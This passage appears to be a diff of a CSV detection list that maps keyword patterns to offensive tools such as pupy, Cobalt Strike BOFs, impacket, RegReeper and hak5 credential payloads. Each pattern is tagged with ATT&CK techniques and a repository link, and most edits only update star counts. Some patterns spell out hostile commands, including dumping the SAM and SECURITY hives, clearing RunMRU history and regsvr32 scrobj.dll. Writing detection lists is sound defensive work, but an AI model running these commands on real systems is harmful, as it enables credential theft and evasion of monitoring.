NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion-main*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*REG ADD *igfxCUIService*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f*","offensive_tool_keyword","reg","Delete run box history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*reg save hklm\sam 1337*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*reg save hklm\system 1337*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f*","offensive_tool_keyword","reg","Delete run box history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*reg save hklm\sam 1337*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*reg save hklm\system 1337*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*reg.exe save HKLM\SAM sam_*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*reg.exe save hklm\sam*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*reg.exe save HKLM\SECURITY security_*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" @@ -15742,64 +15921,65 @@ "*reGeorg-master*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*reGeorgSocksProxy.py*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*register-python-argcomplete --no-defaults exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*registry_hijacking_eventvwr*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*registry_hijacking_fodhelper*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*registry_hijacking_eventvwr*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*registry_hijacking_fodhelper*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*RegistryImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*registry-read.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*registry-read.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*RegistryTinker.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" -"*RegReeper.7z*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" -"*RegReeper.cpp*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" -"*RegReeper.exe*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" -"*RegReeper.sln*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" -"*RegReeper.vcxproj*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" -"*Reg-Restore-Persistence-Mole-main*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*RegReeper.7z*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*RegReeper.cpp*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*RegReeper.exe*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*RegReeper.sln*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*RegReeper.vcxproj*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*Reg-Restore-Persistence-Mole-main*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*regsvr32.exe /s /n /u /i: * scrobj.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*regsvr32_command_delivery_server*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*reinstall_original_pw.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","555","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" +"*regsvr32_command_delivery_server*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reinstall_original_pw.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","556","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" "*rekallreader.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*relay*/utils/enum.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*RelayPackets.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*Release of BloodHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*REM Title: Harvester_OF_SORROW*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*remiflavien1/recon-archy*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*relay*/utils/enum.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*RelayPackets.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Release of BloodHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*REM Title: Harvester_OF_SORROW*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*remiflavien1/recon-archy*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*-remote -destPipe * -pipeHost * -destHost *","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" -"*Remote/lastpass/lastpass.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*Remote/setuserpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*Remote/shspawnas*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 